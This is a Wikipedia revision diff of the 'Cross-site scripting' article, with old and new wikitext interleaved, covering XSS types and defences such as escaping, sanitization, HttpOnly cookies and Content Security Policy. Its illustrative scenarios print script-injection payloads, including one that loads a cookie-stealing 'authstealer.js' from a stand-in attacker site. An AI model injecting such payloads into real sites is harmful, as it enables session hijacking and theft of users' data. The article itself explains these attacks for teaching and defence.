Cross-site scripting: Difference between revisions

Browse history interactively

← Previous edit

Content deleted Content added

VisualWikitext

Revision as of 14:14, 20 April 2023 edit Yoderj (talk \| contribs) 467 edits →Background: Briefly illustrate "URI Scheme" (this is definitely jargon that needs it) ← Previous edit		Latest revision as of 20:03, 15 August 2025 edit undo Frap (talk \| contribs) Extended confirmed users, File movers, Pending changes reviewers, Rollbackers 35,595 edits m →Notable Incidents
(102 intermediate revisions by 62 users not shown)
Line 1: {{Short description\|Security issue for web applications}}{{Use mdy dates\|date=June 2019}}{{Redirect\|XSS}} ~~{{Redirect\|XSS}}{{short description\|Computer security vulnerability}}~~ '''Cross-site scripting''' ('''XSS'''){{Efn\|The abbreviation 'XSS' is commonly used to avoid confusion with [[cascading style sheets]].}} is a type of security [[vulnerability (computer science)\|vulnerability]] that can be found in some [[web application]]s. XSS attacks enable attackers to [[code injection\|inject]] client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the [[same-origin policy]]. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner [[Computer network\|network]]. ~~{{Use mdy dates\|date=June 2018}}~~ ~~{{Information security}}~~ [[OWASP]] considers the term cross-site scripting to be a [[misnomer]]. It initially was an attack that was used for breaching data across sites, but gradually started to include other forms of data injection attacks.<ref>{{Cite web \|title=Cross Site Scripting Prevention - OWASP Cheat SheetSeries\|url=https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html \|access-date=2003-03-19 \|website=[[OWASP]]}}</ref> '''Cross-site scripting''' ('''XSS''') is a type of security [[vulnerability (computer science)\|vulnerability]] that can be found in some [[web application]]s. XSS attacks enable attackers to [[code injection\|inject]] [[client-side script]]s into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass [[access control]]s such as the [[same-origin policy]]. Cross-site scripting carried out on [[website]]s accounted for roughly 84% of all security vulnerabilities documented by [[NortonLifeLock\|Symantec]] up until 2007.<ref name="Symantec-2007-2nd-exec">During the second half of 2007, 11,253 site-specific cross-site vulnerabilities were documented by XSSed, compared to 2,134 "traditional" vulnerabilities documented by Symantec, in {{cite journal \|title=Symantec Internet Security Threat Report: Trends for July–December 2007 (Executive Summary) \|publisher=Symantec Corp. \|volume=XIII \|pages=1–3 \|date=April 2008 \|url=http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf \|access-date=May 11, 2008 \|archive-url=https://web.archive.org/web/20080625065121/http://eval.symantec.com/mktginfo/enterprise/white_papers/b-whitepaper_exec_summary_internet_security_threat_report_xiii_04-2008.en-us.pdf \|archive-date=June 25, 2008 \|url-status=dead }}</ref> XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner [[Computer network\|network]]. ==Background== {{Main\|Web security\|Same-origin policy}} Security on the web depends on a variety of mechanisms, including an underlying concept of trust known as the same-origin policy. This essentially states that if content from one site (such as ''<nowiki>https://mybank.example1.com</nowiki>'') is granted permission to access resources (like cookies etc.) on a web browser, then content from any URL with the same (1) [[URI scheme]] (e.g. ftp, http, or https), (2) [[host name]], ''and'' (3) [[port number]] will share these permissions. Content from URLs where any of these three attributes are different will have to be granted permissions separately.<ref>{{cite web \|title= Same Origin Policy - Web Security. W3.org. \|url= http://www.w3.org/Security/wiki/Same_Origin_Policy \|access-date= November 4, 2014 }}</ref> Security on the web depends on a variety of mechanisms, including an underlying concept of trust known as the [[same-origin policy]]. This states that if content from one site (such as ''<nowiki>https://mybank.example1.com</nowiki>'') is granted permission to access resources (like cookies etc.) on a web browser, then content from any URL with the same (1) [[URI scheme]] (e.g. ftp, http, or https), (2) [[host name]], ''and'' (3) [[port number]] will share these permissions. Content from URLs where any of these three attributes are different will have to be granted permissions separately.<ref>{{cite web \|title= Same Origin Policy - Web Security. W3.org. \|url= http://www.w3.org/Security/wiki/Same_Origin_Policy \|access-date= November 4, 2014 }}</ref> Cross-site scripting attacks use known vulnerabilities in [[Web application\|web-based applications]], their [[Server (computing)\|servers]], or the plug-in systems on which they rely. Exploiting one of these, attackers fold malicious content into the content being delivered from the compromised site. When the resulting combined content arrives at the client-side web browser, it has all been delivered from the trusted source, and thus operates under the permissions granted to that system. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access-privileges to sensitive page content, to session cookies, and to a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are a case of [[code injection]]. [[Microsoft]] security-engineers introduced the term "cross-site scripting" in January 2000.<ref name="xssname">{{cite web \|author= "dross" on MSDN \|title= Happy 10th birthday Cross-Site Scripting! \|url= https://learn.microsoft.com/en-ca/archive/blogs/dross/happy-10th-birthday-cross-site-scripting \|date=15 Dec 2009 \|access-date= 2023-02-09\| quote = On the 16th of January, 2000, the following names were suggested and bounced around among a small group of Microsoft security engineers: [...] The next day there was consensus – Cross Site Scripting. }}</ref>{{Non-primary source needed\|date=October 2024}} The expression "cross-site scripting" originally referred to the act of loading the attacked, third-party web application from an unrelated attack-site, in a manner that executes a fragment of JavaScript prepared by the attacker in the [[same-origin policy\|security context]] of the targeted ___domain (taking advantage of a ''reflected'' or ''non-persistent'' XSS vulnerability). The definition gradually expanded to encompass other modes of code injection, including persistent and non-JavaScript vectors (including [[ActiveX]], [[Java (programming language)\|Java]], [[VBScript]], [[Adobe Flash\|Flash]], or even [[HTML]] scripts), causing some confusion to newcomers to the field of [[information security]].<ref name="Grossman">{{cite web \|last= Grossman \|first= Jeremiah \|title= The origins of Cross-Site Scripting (XSS) \|url= http://jeremiahgrossman.blogspot.com/2006/07/origins-of-cross-site-scripting-xss.html \|date= July 30, 2006 \|access-date= September 15, 2008 }}</ref> XSS vulnerabilities have been reported and exploited since the 1990s. Prominent sites affected in the past include the social-networking sites [[Twitter]]<ref>{{cite news \|last= Arthur \|first= Charles \|title= Twitter users including Sarah Brown hit by malicious hacker attack \|url= https://www.theguardian.com/technology/blog/2010/sep/21/twitter-bug-malicious-exploit-xss \|date= September 21, 2010 \|newspaper= The Guardian \|access-date= September 21, 2010 }}</ref> and Line 29 ⟶ 28: ===Non-persistent (reflected)=== The ''non-persistent'' (or ''reflected'') cross-site scripting vulnerability is by far the most basic type of web vulnerability.<ref name="HopeWalther">{{Cite book \|last1=Paco \|first1=Hope \|last2=Walther \|first2=Ben \|title=Web Security Testing Cookbook \|publisher=O'Reilly Media, Inc. \|year=2008 \|___location=Sebastopol, CA \|page=[https://archive.org/details/websecuritytesti00hope/page/128 128] \|isbn=978-0-596-51483-9 \|url-access=registration \|url=https://archive.org/details/websecuritytesti00hope/page/128 }}</ref> These holes show up when the data provided by a web client,<ref>{{Cite journal \|last1=Hydara \|first1=Isatou \|last2=Sultan \|first2=Abu Bakar Md. \|last3=Zulzalil \|first3=Hazura \|last4=Admodisastro \|first4=Novia \|date=2015-02-01 \|title=Current state of research on cross-site scripting (XSS) – A systematic literature review \|url=https://linkinghub.elsevier.com/retrieve/pii/S0950584914001700 \|journal=Information and Software Technology \|language=en \|volume=58 \|pages=170–186 \|doi=10.1016/j.infsof.2014.07.010\|url-access=subscription }}</ref> most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly [[HTML sanitization\|sanitizing]] the content.<ref name="WASC-2005">{{cite web \|title=Cross-site Scripting \|url=http://projects.webappsec.org/Cross-Site-Scripting \|year=2005 \|publisher=Web Application Security Consortium \|access-date=May 28, 2008}}</ref> ~~{{Quote box~~ ~~\|width=30%~~ ~~\|title=Example of a non-persistent XSS flaw~~ \|1=Non-persistent XSS vulnerabilities in Google could allow malicious sites to attack Google users who visit them while logged in.<ref>{{Cite web\|last=Amit\|first=Yair\|date=December 21, 2005\|title=Google.com UTF-7 XSS Vulnerabilities\|url=http://www.securiteam.com/securitynews/6Z00L0AEUE.html\|url-status=dead\|archive-url=https://web.archive.org/web/20201023080458/https://securiteam.com/securitynews/6Z00L0AEUE\|archive-date=23 October 2020\|access-date=20 February 2022}}</ref> }} Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection.<ref name="HopeWalther" /><ref name="WASC-2005" /> A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly [[Escape character\|escape]] or reject HTML control characters, a cross-site scripting flaw will ensue.<ref name="GHFPR">{{cite book \|last1=Grossman \|first1=Jeremiah \|first2=Robert \|last2=Hansen \|first3=Seth \|last3=Fogie \|first4=Petko D. \|last4=Petkov \|first5=Anton \|last5=Rager \|title=XSS Attacks: Cross Site Scripting Exploits and Defense (Abstract) \|pages=70, 156 \|url=https://books.google.com/books?id=dPhqDe0WHZ8C \|year=2007 \|publisher=Syngress \|isbn=978-1-59749-154-9 \|access-date=May 28, 2008}}</ref> The ''non-persistent'' (or ''reflected'') cross-site scripting vulnerability is by far the most basic type of web vulnerability.<ref name="HopeWalther">{{Cite book \|last1=Paco \|first1=Hope \|last2=Walther \|first2=Ben \|title=Web Security Testing Cookbook \|publisher=O'Reilly Media, Inc. \|year=2008 \|___location=Sebastopol, CA \|page=[https://archive.org/details/websecuritytesti00hope/page/128 128] \|isbn=978-0-596-51483-9 \|url-access=registration \|url=https://archive.org/details/websecuritytesti00hope/page/128 }}</ref> These holes show up when the data provided by a web client,<ref>{{Cite journal \|last1=Hydara \|first1=Isatou \|last2=Sultan \|first2=Abu Bakar Md. \|last3=Zulzalil \|first3=Hazura \|last4=Admodisastro \|first4=Novia \|date=2015-02-01 \|title=Current state of research on cross-site scripting (XSS) – A systematic literature review \|url=https://linkinghub.elsevier.com/retrieve/pii/S0950584914001700 \|journal=Information and Software Technology \|language=en \|volume=58 \|pages=170–186 \|doi=10.1016/j.infsof.2014.07.010}}</ref> most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly [[HTML sanitization\|sanitizing]] the content.<ref name="WASC-2005">{{cite web \|title=Cross-site Scripting \|url=http://projects.webappsec.org/Cross-Site-Scripting \|year=2005 \|publisher=Web Application Security Consortium \|access-date=May 28, 2008}}</ref> Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection.<ref name="HopeWalther" /><ref name="WASC-2005" /> A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properly [[Escape character\|escape]] or reject HTML control characters, a cross-site scripting flaw will ensue.<ref name="GHFPR">{{cite book \|last1=Grossman \|first1=Jeremiah \|first2=Robert \|last2=Hansen \|first3=Seth \|last3=Fogie \|first4=Petko D. \|last4=Petkov \|first5=Anton \|last5=Rager \|title=XSS Attacks: Cross Site Scripting Exploits and Defense (Abstract) \|pages=70, 156 \|url=https://books.google.com/books?id=dPhqDe0WHZ8C \|year=2007 \|isbn=978-1-59749-154-9 \|access-date=May 28, 2008}}</ref> A reflected attack is typically delivered via email or a neutral web site. The bait is an innocent-looking URL, pointing to a trusted site but containing the XSS vector. If the trusted site is vulnerable to the vector, clicking the link can cause the victim's browser to execute the injected script. ===Persistent (or stored)=== ~~{{Quote box~~ ~~\| width = 30%~~ ~~\| title = Example of a persistent XSS flaw~~ \| quote = A persistent [[cross-zone scripting]] vulnerability coupled with a [[computer worm]] allowed execution of arbitrary code and listing of filesystem contents via a QuickTime movie on [[MySpace]].<ref>This worm is named JS/Ofigel-A, JS/Quickspace.A and JS.Qspace, in {{cite web \|title=JS/Ofigel-A \|url=http://www.sophos.com/security/analyses/viruses-and-spyware/jsofigela.html \|archive-url=https://web.archive.org/web/20090802232707/http://www.sophos.com/security/analyses/viruses-and-spyware/jsofigela.html \|url-status=dead \|archive-date=August 2, 2009 \|publisher=Sophos \|access-date=June 5, 2008}} and {{cite web \|title=F-Secure Malware Information Pages: JS/Quickspace.A \|url=http://www.f-secure.com/v-descs/js_quickspace_a.shtml \|date=January 5, 2007 \|publisher=F-Secure \|access-date=June 5, 2008}} and {{cite web \|title=JS.Qspace \|url=http://www.symantec.com/security_response/writeup.jsp?docid=2006-120313-2523-99 \|date=February 13, 2007 \|publisher=Symantec Corp. \|access-date=June 5, 2008}}</ref>\| }} The ''persistent'' (or ''stored'') XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.<ref name="WASC-2005" /> Line 61 ⟶ 48: ===Server-side versus DOM-based vulnerabilities=== ~~{{Quote box~~ ~~\|width=30%~~ ~~\|title=Example of a DOM-based XSS flaw~~ \|Before the bug was resolved, Bugzilla error pages were open to [[Document Object Model\|DOM]]-based XSS attacks in which arbitrary HTML and scripts could be injected using forced error messages.<ref>{{cite web \|title=Bug 272620 – XSS vulnerability in internal error messages \|url=https://bugzilla.mozilla.org/show_bug.cgi?id=272620 \|year=2004 \|access-date=May 29, 2008}}</ref> }} XSS vulnerabilities were originally found in applications that performed all data processing on the server side. User input (including an XSS vector) would be sent to the server, and then sent back to the user as a web page. The need for an improved user experience resulted in popularity of applications that had a majority of the presentation logic (maybe written in [[JavaScript]]) working on the client-side that pulled data, on-demand, from the server using [[AJAX]]. Line 73 ⟶ 55: ===Self-XSS=== {{Main\|Self-XSS}} [[Self-XSS]] is a form of XSS vulnerability that relies on [[Social engineering (security)\|social engineering]] in order to trick the victim into executing malicious JavaScript code in their browser. Although it is technically not a true XSS vulnerability due to the fact it relies on socially engineering a user into executing code rather than a flaw in the affected website allowing an attacker to do so, it still poses the same risks as a regular XSS vulnerability if properly executed.<ref>{{cite web \|title= Self-XSS Facebook scam attempts to trick users into hacking themselves \|work= www.majorgeeks.com \|date= 2014-07-29 \|url= http://www.majorgeeks.com/news/story/self_xss_facebook_scam_attempts_to_trick_users_into_hacking_themselves.html \|access-date= 2016-09-20 }}</ref> ===Mutated XSS (mXSS) === Mutated XSS happens when the attacker injects something that is seemingly safe but is rewritten and modified by the browser while parsing the markup. This makes it extremely hard to detect or sanitize within the website's application logic. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters on parameters to CSS font-family. ~~An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters on parameters to CSS font-family.~~ == Preventive measures == ~~=={{anchor\|Exploit scenarios}}Exploit examples==~~ ===Contextual output encoding/escaping of string input=== There are several escaping schemes that can be used depending on where the untrusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and [[Percent-encoding\|URL (or percent) encoding]].<ref name="OWASP">{{cite web \|last=Williams \|first=Jeff \|title=XSS (Cross Site Scripting) Prevention Cheat Sheet \|url=https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet \|publisher=OWASP \|date=January 19, 2009 \|access-date=February 4, 2010 \|archive-date=March 18, 2017 \|archive-url=https://web.archive.org/web/20170318125710/https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet \|url-status=dead }}</ref> Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS attacks in a fairly straightforward manner. Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the [[Alice and Bob\|Alice-and-Bob cast of characters]] commonly used in computer security. ~~The Browser Exploitation Framework could be used to attack the web site and the user's local environment.~~ Performing HTML entity encoding only on the [[List of XML and HTML character entity references#Standard_public_entity_sets_for_characters\|five XML significant characters]] is not always sufficient to prevent many forms of XSS attacks, security encoding libraries are usually easier to use.<ref name="OWASP" /> ~~===Non-persistent===~~ # Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. When a user logs in, the browser keeps an Authorization Cookie, which looks like some random characters, so both computers (client and server) have a record that she's logged in. ~~# Mallory observes that Bob's website contains a reflected XSS vulnerability:~~ ## When she visits the Search page, she inputs a search term in the search box and clicks the submit button. If no results were found, the page will display the term she searched for followed by the words "not found," and the url will be <code><nowiki>http://bobssite.org/search?q=her</nowiki>%20search%20term</code>. ## With a normal search query, like the word "'''puppies'''", the page simply displays "'''puppies''' not found" and the url is "<nowiki>http://bobssite.org/search</nowiki>'''?q=puppies'''" - which is perfectly normal behavior. ~~## However, when she submits an abnormal search query, like "{{code\|2=html4strict\|1=<script>alert('xss');</script>}}",~~ ~~### An alert box appears (that says "xss").~~ ~~### The page displays " not found," along with an error message with the text 'xss'.~~ ~~### The url is "<code><nowiki>http://bobssite.org/search</nowiki>'''?q=<script>alert('xss');</script>'''</code> - which is exploitable behavior.~~ ~~# Mallory crafts a URL to exploit the vulnerability:~~ ## She makes the URL <code><nowiki>http://bobssite.org/search</nowiki>'''?q=puppies<script%20src="<nowiki>http://mallorysevilsite.com/authstealer.js"></script></nowiki>'''</code>. She could choose to encode the [[ASCII]] characters with [[percent-encoding]], such as <code><nowiki>http://bobssite.org/search</nowiki>'''?q=puppies<nowiki>%3Cscript%20src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E</nowiki>'''</code>, so that human readers cannot immediately decipher the malicious URL.<ref name=geekstuff>{{cite web \|url=http://www.thegeekstuff.com/2012/02/xss-attack-examples/ \|title=XSS Attack Examples (Cross-Site Scripting Attacks) \|author=Lakshmanan Ganapathy \|date=February 16, 2012 \|website=www.thegeekstuff.com}}</ref> ~~## She sends an e-mail to some unsuspecting members of Bob's site, saying "Check out some cute puppies!"~~ # Alice gets the e-mail. She loves puppies and clicks on the link. It goes to Bob's website to search, doesn't find anything, and displays "puppies not found" but right in the middle, the script tag runs (it is invisible on the screen) and loads and runs Mallory's program authstealer.js (triggering the XSS attack). Alice forgets about it. # The authstealer.js program runs in Alice's browser as if it originated from Bob's website. It grabs a copy of Alice's Authorization Cookie and sends it to Mallory's server, where Mallory retrieves it. ~~# Mallory now puts Alice's Authorization Cookie into her browser as if it were her own. She then goes to Bob's site and is now logged in as Alice.~~ # Now that she's in, Mallory goes to the Billing section of the website and looks up Alice's [[Payment card number\|credit card number]] and grabs a copy. Then she goes and changes Alice's account password so Alice can't log in anymore. ~~# She decides to take it a step further and sends a similarly crafted link to Bob himself, thus gaining administrator privileges to Bob's website.~~ Some [[web template system]]s understand the structure of the HTML they produce and automatically pick an appropriate encoder.<ref>{{Cite web\|url=https://golang.org/pkg/html/template/#hdr-Introduction\|title=template - The Go Programming Language\|website=golang.org\|access-date=2019-05-01}}</ref><ref>{{Cite web\|url=https://www.npmjs.com/package/pug-plugin-trusted-types\|title=pug-plugin-trusted-types\|website=npm\|access-date=2019-05-01}}</ref> ~~Several things could have been done to mitigate this attack:~~ * The search input could have been [[HTML sanitization\|sanitized]], which would include proper encoding checking. * The web server could be set to [[Server-side redirect\|redirect]] invalid requests. * The web server could detect a simultaneous login and invalidate the sessions. * The web server could detect a simultaneous login from two different IP addresses and invalidate the sessions. * The website could display only the last few digits of a previously used credit card. * The website could require users to enter their passwords again before changing their registration information. * The website could enact various aspects of the [[Content Security Policy]]. * Set cookie with <code>HttpOnly</code> flag to prevent access from JavaScript. ===Safely validating untrusted HTML input === ~~===Persistent attack===~~ ~~# Mallory gets an account on Bob's website.~~ # Mallory observes that Bob's website contains a stored XSS vulnerability: if one goes to the News section and posts a comment, the site will display whatever is entered. If the comment text contains HTML tags, they will be added to the webpage's source; in particular, any script tags will run when the page is loaded. # Mallory reads an article in the News section and enters a comment: <br> <code>I love the puppies in this story! They're so cute!'''<script src="<nowiki>http://mallorysevilsite.com/authstealer.js</nowiki>">'''</code> # When Alice (or anyone else) loads the page with the comment, Mallory's script tag runs and steals Alice's authorization cookie, sending it to Mallory's secret server for collection.<ref name=geekstuff/> # Mallory can now [[session hijacking\|hijack]] Alice's session and impersonate Alice.<ref>{{cite news \|last=Brodkin \|first=Jon \|title=The top 10 reasons Web sites get hacked \|url=http://www.networkworld.com/article/2286560/lan-wan/the-top-10-reasons-web-sites-get-hacked.html \|date=October 4, 2007 \|work=Network World \|publisher=IDG \|access-date=February 6, 2017 }}</ref><ref name=geekstuff/> Many operators of particular web applications (e.g. forums and webmail) allow users to utilize HTML markup. When accepting HTML input from users (say, <code><b>very</b> large</code>), output encoding (such as <code>&lt;b&gt;very&lt;/b&gt; large</code>) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "'''very''' large", instead of "<b>very</b> large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Often, untrusted HTML input must be run through an [[HTML sanitization]] engine to ensure that it does not contain XSS code. ~~Bob's website software should have stripped out the script tag or done something to make sure it didn't work; the security bug consists in the fact that he didn't.~~ For example, if a user enters ~~=={{anchor\|Mitigation\|Reducing the threat}}Preventive measures==~~ ~~{{manual\|section\|date=December 2014}}~~ <syntaxhighlight lang="html"> ~~===Contextual output encoding/escaping of string input===~~ <span style="color: blue;">Hello world</span> <script>alert("XSS")</script> </syntaxhighlight> then the application processing the markup may allow the <code><<nowiki />span></code> but escape the <code><script></code> tag when the input is displayed: There are several escaping schemes that can be used depending on where the untrusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and [[Percent-encoding\|URL (or percent) encoding]].<ref name="OWASP">{{cite web \|last=Williams \|first=Jeff \|title=XSS (Cross Site Scripting) Prevention Cheat Sheet \|url=https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet \|publisher=OWASP \|date=January 19, 2009 \|access-date=February 4, 2010 \|archive-date=March 18, 2017 \|archive-url=https://web.archive.org/web/20170318125710/https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet \|url-status=dead }}</ref> Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS attacks in a fairly straightforward manner. <syntaxhighlight lang="html"> Performing HTML entity encoding only on the [[List of XML and HTML character entity references#Predefined entities in XML\|five XML significant characters]] is not always sufficient to prevent many forms of XSS attacks, security encoding libraries are usually easier to use.<ref name="OWASP" /> <span style="color: blue;">Hello world</span> <script>alert("XSS")</script> </syntaxhighlight> Many validations rely on parsing out (blacklisting) specific "at risk" HTML tags such as the [[IFRAME\|<code><<nowiki />iframe></code>]], <code><<nowiki />link></code>, and <code><script></code> tag, or by only allowing certain tags and removing or escaping others. Some [[web template system]]s understand the structure of the HTML they produce and automatically pick an appropriate encoder.<ref>{{Cite web\|url=https://golang.org/pkg/html/template/#hdr-Introduction\|title=template - The Go Programming Language\|website=golang.org\|access-date=2019-05-01}}</ref><ref>{{Cite web\|url=https://developers.google.com/closure/templates/docs/security\|title=Google Developers\|website=Google Developers\|language=en\|access-date=2019-05-01}}</ref><ref>{{Cite web\|url=https://www.npmjs.com/package/pug-plugin-trusted-types\|title=pug-plugin-trusted-types\|website=npm\|access-date=2019-05-01}}</ref> ~~===Safely validating untrusted HTML input ===~~ Many operators of particular web applications (e.g. forums and webmail) allow users to utilize a limited subset of HTML markup. When accepting HTML input from users (say, <code><b>very</b> large</code>), output encoding (such as <code><b>very</b> large</code>) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "'''very''' large", instead of "<b>very</b> large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an [[HTML sanitization]] engine to ensure that it does not contain XSS code. ~~Many validations rely on parsing out (blacklisting) specific "at risk" HTML tags such as the following<syntaxhighlight lang="html5">~~ ~~<script> <link> <iframe>~~ ~~</syntaxhighlight>~~ There are several issues with this approach, for example sometimes seemingly harmless tags can be left out which when utilized correctly can still result in an XSS Another popular method is to strip user input of " and ' however this can also be bypassed as the payload can be concealed with [[obfuscation]]. ~~(see the below example) <syntaxhighlight lang="html5">~~ ~~<img src="javascript:alert(1)">~~ </syntaxhighlight>Another popular method is to strip user input of " and ' however this can also be bypassed as the payload can be concealed with [[obfuscation]] (See this [http://www.jsfuck.com/] link for an extreme example of this) ===Cookie security=== {{Further information\|HTTP cookie}} Besides content filtering, other imperfect methods for cross-site scripting mitigation are also commonly used. One example is the use of additional security controls when handling [[HTTP cookie\|cookie]]-based user authentication. Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies.<ref name="Sharma">{{cite web \|last=Sharma \|first=Anand \|title=Prevent a cross-site scripting attack \|url=http://www.ibm.com/developerworks/ibm/library/wa-secxss/ \|publisher=IBM \|date=February 3, 2004 \|access-date=May 29, 2008 }}</ref> To mitigate this particular threat (though not the XSS problem in general), many web applications tie session cookies to the IP address of the user who originally logged in, then only permit that IP to use that cookie.<ref name="ModSecurity">{{cite web \|title=ModSecurity: Features: PDF Universal XSS Protection \|url=http://www.modsecurity.org/projects/modsecurity/apache/feature_universal_pdf_xss.html \|archive-url=https://web.archive.org/web/20080323040609/http://www.modsecurity.org/projects/modsecurity/apache/feature_universal_pdf_xss.html \|url-status=dead \|archive-date=March 23, 2008 \|publisher=Breach Security \|access-date=June 6, 2008 }}</ref> This is effective in most situations (if an attacker is only after the cookie), but obviously breaks down in situations where an attacker is behind the same [[Network address translation\|NAT]]ed IP address or [[web proxy]] as the victim, or the victim is changing his or her [[mobile IP]].<ref name="ModSecurity" /> ====Http-only cookie==== {{Main\|Http-only cookie}} Another mitigation present in [[Internet Explorer]] (since version 6), [[Firefox]] (since version 2.0.0.5), [[Safari (web browser)\|Safari]] (since version 4), [[Opera (web browser)\|Opera]] (since version 9.5) and [[Google Chrome]], is an ''HttpOnly'' flag which allows a web server to set a cookie that is unavailable to client-side scripts. While beneficial, the feature can neither fully prevent cookie theft nor prevent attacks within the browser.<ref>{{cite web \|title=Ajax and Mashup Security \|url=http://www.openajax.org/whitepapers/Ajax%20and%20Mashup%20Security.php \|publisher=OpenAjax Alliance \|access-date=June 9, 2008 \|url-status=dead \|archive-url=https://web.archive.org/web/20080403234132/http://www.openajax.org/whitepapers/Ajax%20and%20Mashup%20Security.php \|archive-date=April 3, 2008 \|df=mdy-all }}</ref> Line 161 ⟶ 113: === Selectively disabling scripts === [[Content Security Policy]]<ref>{{Cite web\|url=https://www.w3.org/TR/CSP3/Overview.html\|title=Content Security Policy Level 3\|website=www.w3.org\|access-date=2019-05-01}}</ref> (CSP) allows HTML documents to opt in to disabling some scripts while leaving others enabled.  The browser checks each script against a policy before deciding whether to run it. As long as the policy only allows trustworthy scripts and disallows [[Eval\|dynamic code loading]], the browser will not run programs from untrusted authors regardless of the HTML document's structure. ====Content Security Policy==== This shifts the security burden to policy authors.  Studies<ref>{{Cite journal\|last=Weichselbaum\|first=Lukas\|date=2016\|title=CSP Is Dead, Long Live CSP! On the Insecurity of Whitelists and the Future of Content Security Policy\|url=https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/45542.pdf\|journal=Proceedings of the 2016 ACM SIGSAC Conference on Computer and Communications Security\|volume=CCS '16\|pages=1376–1387\|doi=10.1145/2976749.2978363\|isbn=9781450341394\|s2cid=16400010\|doi-access=free}}</ref> have cast doubt on the efficacy of host whitelist based policies.<blockquote>In total, we find that 94.68% of policies that attempt to limit script execution are ineffective, and that 99.34% of hosts with CSP use policies that offer no benefit against XSS.</blockquote>Modern<ref>{{Cite web\|url=https://caniuse.com/#feat=contentsecuritypolicy2\|title=Can I use... Support tables for HTML5, CSS3, etc\|website=caniuse.com\|access-date=2019-05-01}}</ref> CSP policies allow using [[Cryptographic nonce\|nonces]]<ref>{{Cite web\|url=https://csp.withgoogle.com/docs/strict-csp.html\|title=Strict CSP - Content Security Policy\|website=csp.withgoogle.com\|access-date=2019-05-01}}</ref> to mark scripts in the HTML document as safe to run instead of keeping the policy entirely separate from the page content.  As long as trusted nonces only appear on trustworthy scripts, the browser will not run programs from untrusted authors. Some large application providers report having successfully deployed nonce-based policies.<ref>{{Cite web\|url=https://www.eweek.com/security/how-google-is-using-content-security-policy-to-mitigate-web-flaws\|title=How Google Is Using Content Security Policy to Mitigate Web Flaws\|website=eWEEK\|date=April 22, 2019 \|access-date=2019-05-01}}</ref><ref>{{Cite web\|url=https://blogs.dropbox.com/tech/2015/09/on-csp-reporting-and-filtering/\|title=[CSP] On Reporting and Filtering\|last=Akhawe\|first=Devdatta\|website=Dropbox Tech Blog\|language=en\|access-date=2019-05-01}}</ref> {{Main\|Content Security Policy}} [[Content Security Policy]] (CSP) allows HTML documents to opt in to disabling some scripts while leaving others enabled.<ref>{{Cite web\|url=https://www.w3.org/TR/CSP3/Overview.html\|title=Content Security Policy Level 3\|website=www.w3.org\|access-date=2019-05-01}}</ref> The browser checks each script against a policy before deciding whether to run it. As long as the policy only allows trustworthy scripts and disallows [[Eval\|dynamic code loading]], the browser will not run programs from untrusted authors regardless of the HTML document's structure. Modern CSP policies allow using [[Cryptographic nonce\|nonces]] to mark scripts in the HTML document as safe to run instead of keeping the policy entirely separate from the page content.<ref>{{Cite web\|url=https://caniuse.com/#feat=contentsecuritypolicy2\|title=Can I use... Support tables for HTML5, CSS3, etc\|website=caniuse.com\|access-date=2019-05-01}}</ref><ref>{{Cite web\|url=https://csp.withgoogle.com/docs/strict-csp.html\|title=Strict CSP - Content Security Policy\|website=csp.withgoogle.com\|access-date=2019-05-01}}</ref> As long as trusted nonces only appear on trustworthy scripts, the browser will not run programs from untrusted authors. Some large application providers report having successfully deployed nonce-based policies.<ref>{{Cite web\|url=https://www.eweek.com/security/how-google-is-using-content-security-policy-to-mitigate-web-flaws\|title=How Google Is Using Content Security Policy to Mitigate Web 